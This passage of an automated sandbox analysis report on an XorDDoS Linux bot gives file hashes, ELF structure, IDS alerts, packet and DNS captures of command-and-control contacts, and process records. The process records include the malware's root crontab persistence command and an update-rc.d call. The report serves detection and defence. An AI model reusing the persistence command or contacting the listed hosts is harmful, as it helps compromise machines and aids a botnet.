                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/ybfpvjxtlx, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/bin/zhoomtcmjp
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548627
                                                                  Entropy (8bit):6.1974962141840555
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoj1:/fUywKQ7Fb1pNL/p52fjQn36Eu1
                                                                  MD5:4A782EB3638511F2DAB1B84597FAB9D0
                                                                  SHA1:9C80CFF6F2C21647514107676B4E5EE0C9A719FE
                                                                  SHA-256:DEA29777F369DB47470DD6BC32234BC48CF077F9DFF96218AABA75D6EF5C2E26
                                                                  SHA-512:7F5FF1C1A470C6762B7E93A0E4F8D91D18E83EA489E9C01AF9BE8B585129DE2FAE0C0F6EEFD11F0270F7BCAE8E2363E76102FAEBE9E9F6833E55FD23B8523B70
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zhoomtcmjp, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.
                                                                  /usr/lib/libudev.so
                                                                  Process:/tmp/XZFWLZVF1Z
                                                                  File Type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Category:dropped
                                                                  Size (bytes):548616
                                                                  Entropy (8bit):6.197434881234913
                                                                  Encrypted:false
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoj:/fUywKQ7Fb1pNL/p52fjQn36Eu
                                                                  MD5:35793CBFD0A4376EA9380FFED9182334
                                                                  SHA1:31E5D905407966CA953DEF90EB45DF417127CF38
                                                                  SHA-256:303BB187A06415EEDC0C5ECE5692FE05B03E286435472D0E4FD4CA9386D9ACF4
                                                                  SHA-512:89FC15518E82CB7C7F97ACB433A1881612D404585B5228E4554A3F9E58C3DB7E9A057F669D98C11C10CF3DD5E73B48A9EBF2B983319EAE709D9751F21DFAAF4A
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/lib/libudev.so, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  Preview: .ELF........................4....Z......4. ...(......................I...I...............I..............Ts........................ ... ................I..............@...........Q.td........................................GNU.................U.....5...................1.^....PTRh <..h`<..QVh............U..S........[...Y..........t..~..X[.......U..S....=.....uT.....-........X......9.v...&........................9.w......t...$<h....o............[]......U..............Z..xX....t .T$..D$......D$.......$<h....q... .....t........t...$ ..............U..W.....VS.............D$......D$.......$.....E..D$.......$.........................D$......D$.......$....E..D$......D$.A.....$.................xk.D$......D$.......$.o...............v.................D$......D$..4$.\.......~........\$..D$..<$....9.t...~..4$..t&......~..<$.................[^_]..&......'....U..WVS....E..}..D$......D$.A.....$.....E.........~j.D$......D$.......$......E.....~?1.....t&...9..E.....~)..).=....~.

                                                                  Static File Info

                                                                  General

                                                                  File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
                                                                  Entropy (8bit):6.197434881234913
                                                                  TrID:
                                                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                  File name:XZFWLZVF1Z
                                                                  File size:548616
                                                                  MD5:35793cbfd0a4376ea9380ffed9182334
                                                                  SHA1:31e5d905407966ca953def90eb45df417127cf38
                                                                  SHA256:303bb187a06415eedc0c5ece5692fe05b03e286435472d0e4fd4ca9386d9acf4
                                                                  SHA512:89fc15518e82cb7c7f97acb433a1881612d404585b5228e4554a3f9e58c3db7e9a057f669d98c11c10cf3dd5e73b48a9ebf2b983319eae709d9751f21dfaaf4a
                                                                  SSDEEP:12288:4Ufrcn+vwK5ripVU4tdZ1pNL/pVbz266ySjQn36Eoj:/fUywKQ7Fb1pNL/p52fjQn36Eu
                                                                  File Content Preview:.ELF........................4....Z......4. ...(......................I...I...............I..............Ts.......................... ... ................I..............@...........Q.td........................................GNU.................U......5...

                                                                  Static ELF Info

                                                                  ELF header

                                                                  Class:ELF32
                                                                  Data:2's complement, little endian
                                                                  Version:1 (current)
                                                                  Machine:Intel 80386
                                                                  Version Number:0x1
                                                                  Type:EXEC (Executable file)
                                                                  OS/ABI:UNIX - System V
                                                                  ABI Version:0
                                                                  Entry Point Address:0x8048110
                                                                  Flags:0x0
                                                                  ELF Header Size:52
                                                                  Program Header Offset:52
                                                                  Program Header Size:32
                                                                  Number of Program Headers:5
                                                                  Section Header Offset:547576
                                                                  Section Header Size:40
                                                                  Number of Section Headers:26
                                                                  Header String Table Index:25

                                                                  Sections

                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                  NULL0x00x00x00x00x0000
                                                                  .note.ABI-tagNOTE0x80480d40xd40x200x00x2A004
                                                                  .initPROGBITS0x80480f40xf40x170x00x6AX004
                                                                  .textPROGBITS0x80481100x1100x681f80x00x6AX0016
                                                                  __libc_freeres_fnPROGBITS0x80b03100x683100x100f0x00x6AX0016
                                                                  __libc_thread_freeres_fnPROGBITS0x80b13200x693200x1db0x00x6AX0016
                                                                  .finiPROGBITS0x80b14fc0x694fc0x1c0x00x6AX004
                                                                  .rodataPROGBITS0x80b15200x695200x152e00x00x2A0032
                                                                  __libc_subfreeresPROGBITS0x80c68000x7e8000x300x00x2A004
                                                                  __libc_atexitPROGBITS0x80c68300x7e8300x40x00x2A004
                                                                  __libc_thread_subfreeresPROGBITS0x80c68340x7e8340x80x00x2A004
                                                                  .eh_framePROGBITS0x80c683c0x7e83c0x60a00x00x2A004
                                                                  .gcc_except_tablePROGBITS0x80cc8dc0x848dc0x11b0x00x2A001
                                                                  .tdataPROGBITS0x80cd9f80x849f80x140x00x403WAT004
                                                                  .tbssNOBITS0x80cda0c0x84a0c0x2c0x00x403WAT004
                                                                  .ctorsPROGBITS0x80cda0c0x84a0c0x80x00x3WA004
                                                                  .dtorsPROGBITS0x80cda140x84a140xc0x00x3WA004
                                                                  .jcrPROGBITS0x80cda200x84a200x40x00x3WA004
                                                                  .data.rel.roPROGBITS0x80cda240x84a240x2c0x00x3WA004
                                                                  .gotPROGBITS0x80cda500x84a500x80x40x3WA004
                                                                  .got.pltPROGBITS0x80cda580x84a580xc0x40x3WA004
                                                                  .dataPROGBITS0x80cda800x84a800xb400x00x3WA0032
                                                                  .bssNOBITS0x80ce5c00x855c00x67780x00x3WA0032
                                                                  __libc_freeres_ptrsNOBITS0x80d4d380x855c00x140x00x3WA004
                                                                  .commentPROGBITS0x00x855c00x4220x00x0001
                                                                  .shstrtabSTRTAB0x00x859e20x1160x00x0001

                                                                  Program Segments

                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                  LOAD0x00x80480000x80480000x849f70x849f73.35500x5R E0x1000.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
                                                                  LOAD0x849f80x80cd9f80x80cd9f80xbc80x73542.90130x6RW 0x1000.ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
                                                                  NOTE0xd40x80480d40x80480d40x200x201.74870x4R 0x4.note.ABI-tag
                                                                  TLS0x849f80x80cd9f80x80cd9f80x140x401.61270x4R 0x4
                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  01/05/22-19:40:50.239861UDP2021326ET TROJAN Likely Linux/Xorddos.F DDoS Attack Participation (aa.hostasa.org)5547553192.168.2.238.8.8.8
                                                                  01/05/22-19:40:50.287419TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP3933680192.168.2.2399.83.154.118
                                                                  01/05/22-19:40:50.502472TCP2020381ET TROJAN DDoS.XOR Checkin406081522192.168.2.2354.36.15.99

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 5, 2022 19:40:50.261040926 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.280374050 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.280503035 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.287419081 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.305473089 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.309283972 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:40:50.336529016 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:40:50.336663008 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:40:50.415947914 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:40:50.458745003 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.458792925 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.458822012 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.458852053 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.458885908 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.458914042 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:50.459029913 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.459085941 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.459095001 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.459100008 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.459105015 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.459110022 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:50.502367973 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:40:50.502471924 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:40:50.529643059 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:40:50.529719114 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:40:53.364285946 CET42836443192.168.2.2391.189.91.43
                                                                  Jan 5, 2022 19:40:53.620276928 CET4251680192.168.2.23109.202.202.202
                                                                  Jan 5, 2022 19:40:55.500093937 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:55.518546104 CET803933699.83.154.118192.168.2.23
                                                                  Jan 5, 2022 19:40:55.518630028 CET3933680192.168.2.2399.83.154.118
                                                                  Jan 5, 2022 19:40:55.864212036 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:40:55.864264011 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:05.910269976 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:05.910487890 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:08.213030100 CET43928443192.168.2.2391.189.91.42
                                                                  Jan 5, 2022 19:41:15.942517042 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:15.942661047 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:20.501755953 CET42836443192.168.2.2391.189.91.43
                                                                  Jan 5, 2022 19:41:24.597831011 CET4251680192.168.2.23109.202.202.202
                                                                  Jan 5, 2022 19:41:25.975254059 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:25.975478888 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:30.914828062 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:30.915090084 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:40.961047888 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:40.961127996 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:41:49.174820900 CET43928443192.168.2.2391.189.91.42
                                                                  Jan 5, 2022 19:41:50.993355989 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:41:50.993587017 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:01.025540113 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:01.025779009 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:05.980561972 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:05.980700016 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:16.011374950 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:16.011704922 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:26.043908119 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:26.044156075 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:36.076154947 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:36.076385975 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:41.033004999 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:41.033231974 CET406081522192.168.2.2354.36.15.99
                                                                  Jan 5, 2022 19:42:51.062601089 CET15224060854.36.15.99192.168.2.23
                                                                  Jan 5, 2022 19:42:51.062836885 CET406081522192.168.2.2354.36.15.99

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 5, 2022 19:40:50.239861012 CET5547553192.168.2.238.8.8.8
                                                                  Jan 5, 2022 19:40:50.260778904 CET53554758.8.8.8192.168.2.23
                                                                  Jan 5, 2022 19:40:50.290445089 CET3400753192.168.2.238.8.8.8
                                                                  Jan 5, 2022 19:40:50.308990955 CET53340078.8.8.8192.168.2.23

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Jan 5, 2022 19:40:50.239861012 CET192.168.2.238.8.8.80xcbf9Standard query (0)aa.hostasa.orgA (IP address)IN (0x0001)
                                                                  Jan 5, 2022 19:40:50.290445089 CET192.168.2.238.8.8.80x11f7Standard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Jan 5, 2022 19:40:50.260778904 CET8.8.8.8192.168.2.230xcbf9No error (0)aa.hostasa.org99.83.154.118A (IP address)IN (0x0001)
                                                                  Jan 5, 2022 19:40:50.308990955 CET8.8.8.8192.168.2.230x11f7No error (0)ppp.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                  Jan 5, 2022 19:40:50.308990955 CET8.8.8.8192.168.2.230x11f7No error (0)ppp.gggatat456.com54.36.145.104A (IP address)IN (0x0001)
                                                                  Jan 5, 2022 19:40:50.308990955 CET8.8.8.8192.168.2.230x11f7No error (0)ppp.gggatat456.com54.36.145.106A (IP address)IN (0x0001)
                                                                  Jan 5, 2022 19:40:50.308990955 CET8.8.8.8192.168.2.230x11f7No error (0)ppp.gggatat456.com54.36.15.97A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • aa.hostasa.org

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                  0192.168.2.233933699.83.154.11880
                                                                  TimestampkBytes transferredDirectionData
                                                                  Jan 5, 2022 19:40:50.287419081 CET0OUTGET /config.rar HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: zh-cn
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                                  Host: aa.hostasa.org
                                                                  Connection: Keep-Alive
                                                                  Jan 5, 2022 19:40:50.458745003 CET2INHTTP/1.1 200 OK
                                                                  Date: Wed, 05 Jan 2022 18:40:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Server: nginx
                                                                  Vary: Accept-Encoding
                                                                  Vary: Accept-Encoding
                                                                  X-Redirect: skenzo
                                                                  X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                  X-Language: german
                                                                  Accept-CH: viewport-width
                                                                  Accept-CH: dpr
                                                                  Accept-CH: device-memory
                                                                  Accept-CH: rtt
                                                                  Accept-CH: downlink
                                                                  Accept-CH: ect
                                                                  Accept-CH: ua
                                                                  Accept-CH: ua-full-version
                                                                  Accept-CH: ua-platform
                                                                  Accept-CH: ua-platform-version
                                                                  Accept-CH: ua-arch
                                                                  Accept-CH: ua-model
                                                                  Accept-CH: ua-mobile
                                                                  Accept-CH-Lifetime: 30
                                                                  Data Raw: 31 30 36 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 68 6f 73 74 61 73 61 26 23 34 36 3b 6f 72 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 68 6f 73 74 61 73 61 2e 6f 72 67 27 3b 0a 76 61 72 20 75 6e 69 71 75 65 54 72 61 63 6b 69 6e 67 49 44 20 3d 20 27 4d 54 59 30 4d 54 51 77 4f 44 41 31 4d 43 34 30 4d 54 45 30 4f 6a 6b 31 4e 7a 56 68 4e 47 59 33 4f 44 41 34 4d 7a 5a 6d 4d 6d 55 34 4f 44 4e 6c 4d 6a 42 6d 4d 57 49 31 4d 57 45 77 4d 6d 4e 6a 5a 44 67 35 4f 44 6b 7a 59 32 5a 6c 4d 32 5a 6a 4f 44 55 32 59 6a 42 6c 4d 32 56 6d 59 57 46 68 4f 54 6b 77 5a 47 4e 6c 59 6a 55 36 4e 6a 46 6b 4e 57 55 32 4d 7a 49 32 4e 44 63 79 4e 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76 61 72 20
                                                                  Data Ascii: 1060<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>hostasa&#46;org</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><script type='text/javascript' language='JavaScript'>var domain = 'hostasa.org';var uniqueTrackingID = 'MTY0MTQwODA1MC40MTE0Ojk1NzVhNGY3ODA4MzZmMmU4ODNlMjBmMWI1MWEwMmNjZDg5ODkzY2ZlM2ZjODU2YjBlM2VmYWFhOTkwZGNlYjU6NjFkNWU2MzI2NDcyNA==';var clickTracking = false;var themedata = '';var xkw = '';var
                                                                  Jan 5, 2022 19:40:50.458792925 CET3INData Raw: 78 73 65 61 72 63 68 20 3d 20 27 27 3b 0a 76 61 72 20 78 70 63 61 74 20 3d 20 27 27 3b 0a 76 61 72 20 72 78 69 64 20 3d 20 27 27 3b 0a 76 61 72 20 62 75 63 6b 65 74 20 3d 20 27 27 3b 0a 76 61 72 20 63 6c 69 65 6e 74 49 44 20 3d 20 27 27 3b 0a 76
                                                                  Data Ascii: xsearch = '';var xpcat = '';var rxid = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script><script src='//d1lxhc4jvstzrp.cloudfront.net/scripts/js3.js' type='tex
                                                                  Jan 5, 2022 19:40:50.458822012 CET4INData Raw: 4d 45 39 71 61 7a 46 4f 65 6c 5a 6f 54 6b 64 5a 4d 30 39 45 51 54 52 4e 65 6c 70 74 54 57 31 56 4e 45 39 45 54 6d 78 4e 61 6b 4a 74 54 56 64 4a 4d 55 31 58 52 58 64 4e 62 55 35 71 57 6b 52 6e 4e 55 39 45 61 33 70 5a 4d 6c 70 73 54 54 4a 61 61 6b
                                                                  Data Ascii: ME9qazFOelZoTkdZM09EQTRNelptTW1VNE9ETmxNakJtTVdJMU1XRXdNbU5qWkRnNU9Ea3pZMlpsTTJaak9EVTJZakJsTTJWbVlXRmhPVGt3WkdObFlqVTZOakZrTldVMk16STJORGN5TkE9PSIsImJhc2VVbmlxdWVJRCI6IjVmZGRlZjY3ODgxOTc1NmEyZWU1YzVlMDQ2YjI0NjA3YTQyN2I0MWIiLCJ1bmlxdWVJRCI6IjV
                                                                  Jan 5, 2022 19:40:50.458852053 CET6INData Raw: 4d 7a 59 34 49 69 77 69 5a 58 68 30 53 58 41 69 4f 69 49 78 4f 44 55 75 4e 54 4d 75 4d 54 63 34 4c 6a 45 31 4f 43 49 73 49 6e 46 31 61 57 4e 72 56 47 6c 6c 63 6a 49 69 4f 6d 5a 68 62 48 4e 6c 4c 43 4a 7a 63 32 77 69 4f 6d 5a 68 62 48 4e 6c 4c 43
                                                                  Data Ascii: MzY4IiwiZXh0SXAiOiIxODUuNTMuMTc4LjE1OCIsInF1aWNrVGllcjIiOmZhbHNlLCJzc2wiOmZhbHNlLCJzc2xIYXNDZXJ0IjpudWxsLCI1MWRlZ3JlZXMiOnsiSGFyZHdhcmVGYW1pbHkiOiJFbXVsYXRvciIsIkhhcmR3YXJlTW9kZWwiOiJVbmtub3duIiwiSGFyZHdhcmVOYW1lIjoiRGVza3RvcCIsIkhhcmR3YXJlVmV
                                                                  Jan 5, 2022 19:40:50.458885908 CET6INData Raw: 3e 0a 0d 0a
                                                                  Data Ascii: >
                                                                  Jan 5, 2022 19:40:50.458914042 CET6INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  System Behavior

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:/tmp/XZFWLZVF1Z
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/sbin/update-rc.d
                                                                  Arguments:update-rc.d XZFWLZVF1Z defaults
                                                                  File size:3478464 bytes
                                                                  MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                  General

                                                                  Start time:19:40:49
                                                                  Start date:05/01/2022
                                                                  Path:/sbin/update-rc.d
                                                                  Arguments:n/a
                                                                  File size:3478464 bytes
                                                                  MD5 hash:16a21f464119ea7fad1d3660de963637

                                                                  General

                                                                  Start time:19:40:49
                                                                  Start date:05/01/2022
                                                                  Path:/bin/systemctl
                                                                  Arguments:systemctl daemon-reload
                                                                  File size:996584 bytes
                                                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/bin/sh
                                                                  Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/bin/sh
                                                                  Arguments:n/a
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  General

                                                                  Start time:19:40:48
                                                                  Start date:05/01/2022
                                                                  Path:/bin/sed
                                                                  Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                                  File size:121288 bytes
                                                                  MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/tmp/XZFWLZVF1Z
                                                                  Arguments:n/a
                                                                  File size:548616 bytes
                                                                  MD5 hash:35793cbfd0a4376ea9380ffed9182334

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
                                                                  Arguments:/usr/bin/vxnottgwjc "route -n" 5218
                                                                  File size:548627 bytes
                                                                  MD5 hash:6d4eba06d1cf1d5747184ff55e34ea65

                                                                  General

                                                                  Start time:19:40:54
                                                                  Start date:05/01/2022
                                                                  Path:/usr/bin/vxnottgwjc
